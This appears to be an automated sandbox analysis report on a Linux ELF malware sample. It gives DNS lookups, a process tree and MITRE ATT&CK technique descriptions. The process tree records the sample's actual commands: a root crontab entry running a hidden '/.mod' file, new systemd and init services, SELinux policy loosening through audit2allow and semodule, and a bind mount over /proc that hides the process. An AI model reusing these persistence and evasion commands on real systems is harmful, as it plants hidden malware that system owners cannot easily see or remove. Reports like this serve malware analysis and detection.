Oct 16, 2024 10:07:07.185023069 CEST	192.168.2.13	8.8.8.8	0x70a0	Standard query (0)	www.google.com	28	IN (0x0001)	false
Oct 16, 2024 10:07:07.186002970 CEST	192.168.2.13	8.8.8.8	0xfb3d	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 16, 2024 10:07:07.193970919 CEST	8.8.8.8	192.168.2.13	0xfb3d	No error (0)	www.google.com		142.250.186.132	A (IP address)	IN (0x0001)	false
Oct 16, 2024 10:07:07.201395988 CEST	8.8.8.8	192.168.2.13	0x70a0	No error (0)	www.google.com			28	IN (0x0001)	false

System Behavior

Analysis Process: sBKWt6JPZa.elf PID: 5404, Parent PID: 5327

General

Start time (UTC):	08:07:00
Start date (UTC):	16/10/2024
Path:	/tmp/sBKWt6JPZa.elf
Arguments:	/tmp/sBKWt6JPZa.elf
File size:	2027704 bytes
MD5 hash:	63945044a721e944cfad5d1223a109d4

Chronological Activities

Analysis Process: sBKWt6JPZa.elf PID: 5409, Parent PID: 5404

General

Start time (UTC):	08:07:01
Start date (UTC):	16/10/2024
Path:	/tmp/sBKWt6JPZa.elf
Arguments:	-
File size:	2027704 bytes
MD5 hash:	63945044a721e944cfad5d1223a109d4

Chronological Activities

Analysis Process: sBKWt6JPZa.elf PID: 5409, Parent PID: 5404

General

Start time (UTC):	08:07:01
Start date (UTC):	16/10/2024
Path:	/tmp/sBKWt6JPZa.elf
Arguments:	/tmp/sBKWt6JPZa.elf
File size:	2027704 bytes
MD5 hash:	63945044a721e944cfad5d1223a109d4

Chronological Activities

Analysis Process: sBKWt6JPZa.elf PID: 5414, Parent PID: 5409

General

Start time (UTC):	08:07:01
Start date (UTC):	16/10/2024
Path:	/tmp/sBKWt6JPZa.elf
Arguments:	-
File size:	2027704 bytes
MD5 hash:	63945044a721e944cfad5d1223a109d4

Chronological Activities

Analysis Process: bash PID: 5414, Parent PID: 5409

General

Start time (UTC):	08:07:01
Start date (UTC):	16/10/2024
Path:	/bin/bash
Arguments:	/bin/bash -c "cd /boot;systemctl daemon-reload;systemctl enable quotaon.service;systemctl start quotaon.service;journalctl -xe --no-pager"
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: bash PID: 5415, Parent PID: 5414

General

Start time (UTC):	08:07:01
Start date (UTC):	16/10/2024
Path:	/bin/bash
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: systemctl PID: 5415, Parent PID: 5414

General

Start time (UTC):	08:07:01
Start date (UTC):	16/10/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl daemon-reload
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: bash PID: 5419, Parent PID: 5414

General

Start time (UTC):	08:07:01
Start date (UTC):	16/10/2024
Path:	/bin/bash
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: systemctl PID: 5419, Parent PID: 5414

General

Start time (UTC):	08:07:01
Start date (UTC):	16/10/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl enable quotaon.service
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: bash PID: 5423, Parent PID: 5414

General

Start time (UTC):	08:07:01
Start date (UTC):	16/10/2024
Path:	/bin/bash
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: systemctl PID: 5423, Parent PID: 5414

General

Start time (UTC):	08:07:01
Start date (UTC):	16/10/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl start quotaon.service
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: bash PID: 5424, Parent PID: 5414

General

Start time (UTC):	08:07:01
Start date (UTC):	16/10/2024
Path:	/bin/bash
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: journalctl PID: 5424, Parent PID: 5414

General

Start time (UTC):	08:07:01
Start date (UTC):	16/10/2024
Path:	/usr/bin/journalctl
Arguments:	journalctl -xe --no-pager
File size:	80120 bytes
MD5 hash:	bf3a987344f3bacafc44efd882abda8b

Chronological Activities

Analysis Process: sBKWt6JPZa.elf PID: 5425, Parent PID: 5409

General

Start time (UTC):	08:07:02
Start date (UTC):	16/10/2024
Path:	/tmp/sBKWt6JPZa.elf
Arguments:	-
File size:	2027704 bytes
MD5 hash:	63945044a721e944cfad5d1223a109d4

Chronological Activities

Analysis Process: bash PID: 5425, Parent PID: 5409

General

Start time (UTC):	08:07:02
Start date (UTC):	16/10/2024
Path:	/bin/bash
Arguments:	/bin/bash -c "cd /boot;ausearch -c 'system.pub' --raw \| audit2allow -M my-Systemmod;semodule -X 300 -i my-Systemmod.pp"
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: bash PID: 5426, Parent PID: 5425

General

Start time (UTC):	08:07:02
Start date (UTC):	16/10/2024
Path:	/bin/bash
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: bash PID: 5427, Parent PID: 5425

General

Start time (UTC):	08:07:02
Start date (UTC):	16/10/2024
Path:	/bin/bash
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: bash PID: 5428, Parent PID: 5425

General

Start time (UTC):	08:07:02
Start date (UTC):	16/10/2024
Path:	/bin/bash
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: sBKWt6JPZa.elf PID: 5429, Parent PID: 5409

General

Start time (UTC):	08:07:02
Start date (UTC):	16/10/2024
Path:	/tmp/sBKWt6JPZa.elf
Arguments:	-
File size:	2027704 bytes
MD5 hash:	63945044a721e944cfad5d1223a109d4

Chronological Activities

Analysis Process: bash PID: 5429, Parent PID: 5409

General

Start time (UTC):	08:07:02
Start date (UTC):	16/10/2024
Path:	/bin/bash
Arguments:	/bin/bash -c "echo \"/1 * * * root /.mod \" >> /etc/crontab"
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: sBKWt6JPZa.elf PID: 5430, Parent PID: 5409

General

Start time (UTC):	08:07:03
Start date (UTC):	16/10/2024
Path:	/tmp/sBKWt6JPZa.elf
Arguments:	-
File size:	2027704 bytes
MD5 hash:	63945044a721e944cfad5d1223a109d4

Chronological Activities

Analysis Process: update-rc.d PID: 5430, Parent PID: 5409

General

Start time (UTC):	08:07:03
Start date (UTC):	16/10/2024
Path:	/usr/sbin/update-rc.d
Arguments:	update-rc.d dns-udp4 defaults
File size:	3478464 bytes
MD5 hash:	16a21f464119ea7fad1d3660de963637

Chronological Activities

Analysis Process: update-rc.d PID: 5431, Parent PID: 5430

General

Start time (UTC):	08:07:03
Start date (UTC):	16/10/2024
Path:	/usr/sbin/update-rc.d
Arguments:	-
File size:	3478464 bytes
MD5 hash:	16a21f464119ea7fad1d3660de963637

Chronological Activities

Analysis Process: systemctl PID: 5431, Parent PID: 5430

General

Start time (UTC):	08:07:03
Start date (UTC):	16/10/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl daemon-reload
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: sBKWt6JPZa.elf PID: 5435, Parent PID: 5409

General

Start time (UTC):	08:07:03
Start date (UTC):	16/10/2024
Path:	/tmp/sBKWt6JPZa.elf
Arguments:	-
File size:	2027704 bytes
MD5 hash:	63945044a721e944cfad5d1223a109d4

Chronological Activities

Analysis Process: mount PID: 5435, Parent PID: 5409

General

Start time (UTC):	08:07:03
Start date (UTC):	16/10/2024
Path:	/usr/bin/mount
Arguments:	mount -o bind /tmp/ /proc/5409
File size:	55528 bytes
MD5 hash:	92b20aa8b155ecd3ba9414aa477ef565

Chronological Activities

Analysis Process: sBKWt6JPZa.elf PID: 5457, Parent PID: 5409

General

Start time (UTC):	08:07:03
Start date (UTC):	16/10/2024
Path:	/tmp/sBKWt6JPZa.elf
Arguments:	-
File size:	2027704 bytes
MD5 hash:	63945044a721e944cfad5d1223a109d4

Chronological Activities

Analysis Process: service PID: 5457, Parent PID: 5409

General

Start time (UTC):	08:07:03
Start date (UTC):	16/10/2024
Path:	/usr/sbin/service
Arguments:	service cron start
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: service PID: 5458, Parent PID: 5457

General

Start time (UTC):	08:07:04
Start date (UTC):	16/10/2024
Path:	/usr/sbin/service
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: basename PID: 5458, Parent PID: 5457

General

Start time (UTC):	08:07:04
Start date (UTC):	16/10/2024
Path:	/usr/bin/basename
Arguments:	basename /usr/sbin/service
File size:	39256 bytes
MD5 hash:	3283660e59f128df18bec9b96fbd4d41

Chronological Activities

Analysis Process: service PID: 5461, Parent PID: 5457

General

Start time (UTC):	08:07:04
Start date (UTC):	16/10/2024
Path:	/usr/sbin/service
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: basename PID: 5461, Parent PID: 5457

General

Start time (UTC):	08:07:04
Start date (UTC):	16/10/2024
Path:	/usr/bin/basename
Arguments:	basename /usr/sbin/service
File size:	39256 bytes
MD5 hash:	3283660e59f128df18bec9b96fbd4d41

Chronological Activities

Analysis Process: service PID: 5462, Parent PID: 5457

General

Start time (UTC):	08:07:04
Start date (UTC):	16/10/2024
Path:	/usr/sbin/service
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: systemctl PID: 5462, Parent PID: 5457

General

Start time (UTC):	08:07:04
Start date (UTC):	16/10/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl --quiet is-active multi-user.target
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: service PID: 5465, Parent PID: 5457

General

Start time (UTC):	08:07:04
Start date (UTC):	16/10/2024
Path:	/usr/sbin/service
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: service PID: 5472, Parent PID: 5465

General

Start time (UTC):	08:07:04
Start date (UTC):	16/10/2024
Path:	/usr/sbin/service
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: systemctl PID: 5472, Parent PID: 5465

General

Start time (UTC):	08:07:04
Start date (UTC):	16/10/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl list-unit-files --full --type=socket
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: service PID: 5477, Parent PID: 5465

General

Start time (UTC):	08:07:04
Start date (UTC):	16/10/2024
Path:	/usr/sbin/service
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sed PID: 5477, Parent PID: 5465

General

Start time (UTC):	08:07:04
Start date (UTC):	16/10/2024
Path:	/usr/bin/sed
Arguments:	sed -ne s/\\.socket\\s[a-z]\\s*$/.socket/p
File size:	121288 bytes
MD5 hash:	885062561f66aa1d4af4c54b9e7cc81a

Chronological Activities

Analysis Process: systemctl PID: 5457, Parent PID: 5409

General

Start time (UTC):	08:07:06
Start date (UTC):	16/10/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl start cron.service
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: sBKWt6JPZa.elf PID: 5489, Parent PID: 5409

General

Start time (UTC):	08:07:06
Start date (UTC):	16/10/2024
Path:	/tmp/sBKWt6JPZa.elf
Arguments:	-
File size:	2027704 bytes
MD5 hash:	63945044a721e944cfad5d1223a109d4

Chronological Activities

Analysis Process: systemctl PID: 5489, Parent PID: 5409

General

Start time (UTC):	08:07:06
Start date (UTC):	16/10/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl start crond.service
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: systemd PID: 5417, Parent PID: 5416

General

Start time (UTC):	08:07:01
Start date (UTC):	16/10/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Chronological Activities

Analysis Process: snapd-env-generator PID: 5417, Parent PID: 5416

General

Start time (UTC):	08:07:01
Start date (UTC):	16/10/2024
Path:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
Arguments:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File size:	22760 bytes
MD5 hash:	3633b075f40283ec938a2a6a89671b0e

Chronological Activities

Analysis Process: systemd PID: 5421, Parent PID: 5420

General

Start time (UTC):	08:07:01
Start date (UTC):	16/10/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Chronological Activities

Analysis Process: snapd-env-generator PID: 5421, Parent PID: 5420

General

Start time (UTC):	08:07:01
Start date (UTC):	16/10/2024
Path:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
Arguments:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File size:	22760 bytes
MD5 hash:	3633b075f40283ec938a2a6a89671b0e

Chronological Activities

Analysis Process: systemd PID: 5433, Parent PID: 5432

General

Start time (UTC):	08:07:03
Start date (UTC):	16/10/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Chronological Activities

Analysis Process: snapd-env-generator PID: 5433, Parent PID: 5432

General

Start time (UTC):	08:07:03
Start date (UTC):	16/10/2024
Path:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
Arguments:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File size:	22760 bytes
MD5 hash:	3633b075f40283ec938a2a6a89671b0e

Chronological Activities

Analysis Process: udisksd PID: 5444, Parent PID: 802

General

Start time (UTC):	08:07:03
Start date (UTC):	16/10/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Chronological Activities

Analysis Process: dumpe2fs PID: 5444, Parent PID: 802

General

Start time (UTC):	08:07:03
Start date (UTC):	16/10/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Chronological Activities

Analysis Process: systemd PID: 5478, Parent PID: 1

General

Start time (UTC):	08:07:06
Start date (UTC):	16/10/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Chronological Activities

Analysis Process: cron PID: 5478, Parent PID: 1

General

Start time (UTC):	08:07:06
Start date (UTC):	16/10/2024
Path:	/usr/sbin/cron
Arguments:	/usr/sbin/cron -f
File size:	55944 bytes
MD5 hash:	2c82564ff5cc862c89392b061c7fbd59

Chronological Activities

Analysis Process: cron PID: 5538, Parent PID: 5478

General

Start time (UTC):	08:08:01
Start date (UTC):	16/10/2024
Path:	/usr/sbin/cron
Arguments:	-
File size:	55944 bytes
MD5 hash:	2c82564ff5cc862c89392b061c7fbd59

Chronological Activities

Analysis Process: cron PID: 5547, Parent PID: 5538

General

Start time (UTC):	08:08:01
Start date (UTC):	16/10/2024
Path:	/usr/sbin/cron
Arguments:	-
File size:	55944 bytes
MD5 hash:	2c82564ff5cc862c89392b061c7fbd59

Chronological Activities

Analysis Process: sh PID: 5547, Parent PID: 5538

General

Start time (UTC):	08:08:01
Start date (UTC):	16/10/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "/.mod "
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5548, Parent PID: 5547

General

Start time (UTC):	08:08:01
Start date (UTC):	16/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: .mod PID: 5548, Parent PID: 5547

General

Start time (UTC):	08:08:01
Start date (UTC):	16/10/2024
Path:	/.mod
Arguments:	/.mod
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: .mod PID: 5549, Parent PID: 5548

General

Start time (UTC):	08:08:01
Start date (UTC):	16/10/2024
Path:	/.mod
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: libgdi.so.0.8.2 PID: 5549, Parent PID: 5548

General

Start time (UTC):	08:08:01
Start date (UTC):	16/10/2024
Path:	/usr/lib/libgdi.so.0.8.2
Arguments:	/usr/lib/libgdi.so.0.8.2
File size:	2027704 bytes
MD5 hash:	63945044a721e944cfad5d1223a109d4

Chronological Activities

Analysis Process: libgdi.so.0.8.2 PID: 5553, Parent PID: 5549

General

Start time (UTC):	08:08:01
Start date (UTC):	16/10/2024
Path:	/usr/lib/libgdi.so.0.8.2
Arguments:	-
File size:	2027704 bytes
MD5 hash:	63945044a721e944cfad5d1223a109d4

Chronological Activities

Analysis Process: libgdi.so.0.8.2 PID: 5553, Parent PID: 5549

General

Start time (UTC):	08:08:01
Start date (UTC):	16/10/2024
Path:	/usr/lib/libgdi.so.0.8.2
Arguments:	/usr/lib/libgdi.so.0.8.2
File size:	2027704 bytes
MD5 hash:	63945044a721e944cfad5d1223a109d4

Chronological Activities

Analysis Process: systemd PID: 5561, Parent PID: 1

General

Start time (UTC):	08:08:02
Start date (UTC):	16/10/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Chronological Activities

Analysis Process: cron PID: 5561, Parent PID: 1

General

Start time (UTC):	08:08:02
Start date (UTC):	16/10/2024
Path:	/usr/sbin/cron
Arguments:	/usr/sbin/cron -f
File size:	55944 bytes
MD5 hash:	2c82564ff5cc862c89392b061c7fbd59

Chronological Activities

Analysis Process: cron PID: 5601, Parent PID: 5561

General

Start time (UTC):	08:09:01
Start date (UTC):	16/10/2024
Path:	/usr/sbin/cron
Arguments:	-
File size:	55944 bytes
MD5 hash:	2c82564ff5cc862c89392b061c7fbd59

Chronological Activities

Analysis Process: cron PID: 5611, Parent PID: 5601

General

Start time (UTC):	08:09:01
Start date (UTC):	16/10/2024
Path:	/usr/sbin/cron
Arguments:	-
File size:	55944 bytes
MD5 hash:	2c82564ff5cc862c89392b061c7fbd59

Chronological Activities

Analysis Process: sh PID: 5611, Parent PID: 5601

General

Start time (UTC):	08:09:01
Start date (UTC):	16/10/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "/.mod "
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5612, Parent PID: 5611

General

Start time (UTC):	08:09:01
Start date (UTC):	16/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: .mod PID: 5612, Parent PID: 5611

General

Start time (UTC):	08:09:01
Start date (UTC):	16/10/2024
Path:	/.mod
Arguments:	/.mod
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: .mod PID: 5617, Parent PID: 5612

General

Start time (UTC):	08:09:01
Start date (UTC):	16/10/2024
Path:	/.mod
Arguments:	-
File size:	1183448 bytes
MD5 hash:	7063c3930affe123baecd3b340f1ad2c

Chronological Activities

Analysis Process: libgdi.so.0.8.2 PID: 5617, Parent PID: 5612

General

Start time (UTC):	08:09:01
Start date (UTC):	16/10/2024
Path:	/usr/lib/libgdi.so.0.8.2
Arguments:	/usr/lib/libgdi.so.0.8.2
File size:	2027704 bytes
MD5 hash:	63945044a721e944cfad5d1223a109d4

Chronological Activities

Analysis Process: libgdi.so.0.8.2 PID: 5621, Parent PID: 5617

General

Start time (UTC):	08:09:01
Start date (UTC):	16/10/2024
Path:	/usr/lib/libgdi.so.0.8.2
Arguments:	-
File size:	2027704 bytes
MD5 hash:	63945044a721e944cfad5d1223a109d4

Chronological Activities

Analysis Process: libgdi.so.0.8.2 PID: 5621, Parent PID: 5617

General

Start time (UTC):	08:09:01
Start date (UTC):	16/10/2024
Path:	/usr/lib/libgdi.so.0.8.2
Arguments:	/usr/lib/libgdi.so.0.8.2
File size:	2027704 bytes
MD5 hash:	63945044a721e944cfad5d1223a109d4

Chronological Activities

Analysis Process: cron PID: 5604, Parent PID: 5561

General

Start time (UTC):	08:09:01
Start date (UTC):	16/10/2024
Path:	/usr/sbin/cron
Arguments:	-
File size:	55944 bytes
MD5 hash:	2c82564ff5cc862c89392b061c7fbd59

Chronological Activities

Analysis Process: cron PID: 5610, Parent PID: 5604

General

Start time (UTC):	08:09:01
Start date (UTC):	16/10/2024
Path:	/usr/sbin/cron
Arguments:	-
File size:	55944 bytes
MD5 hash:	2c82564ff5cc862c89392b061c7fbd59

Chronological Activities

Analysis Process: sh PID: 5610, Parent PID: 5604

General

Start time (UTC):	08:09:01
Start date (UTC):	16/10/2024
Path:	/bin/sh
Arguments:	/bin/sh -c " [ -x /usr/lib/php/sessionclean ] && if [ ! -d /run/systemd/system ]; then /usr/lib/php/sessionclean; fi"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: systemd PID: 5625, Parent PID: 1

General

Start time (UTC):	08:09:01
Start date (UTC):	16/10/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Chronological Activities

Analysis Process: cron PID: 5625, Parent PID: 1

General

Start time (UTC):	08:09:01
Start date (UTC):	16/10/2024
Path:	/usr/sbin/cron
Arguments:	/usr/sbin/cron -f
File size:	55944 bytes
MD5 hash:	2c82564ff5cc862c89392b061c7fbd59

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence through executing malicious commands triggered by a user’s shell. User Unix Shell s execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command-line interface or remotely logs in (such as via SSH) a login shell is initiated. The login shell executes scripts from the system ( `/etc` ) and the user’s home directory ( `~/` ) to configure the environment. All login shells on a system use /etc/profile when initiated. These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user’s environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation
Platforms:	Linux, macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation, Service: Service Creation, Service: Service Modification
Platforms:	Linux
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.
Tactics:	Defense Evasion
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Creation, File: File Metadata, File: File Modification, Firmware: Firmware Modification, Process: OS API Execution, Process: Process Creation, Script: Script Execution, Service: Service Creation, User Account: User Account Creation, User Account: User Account Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Tactics:	Defense Evasion
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

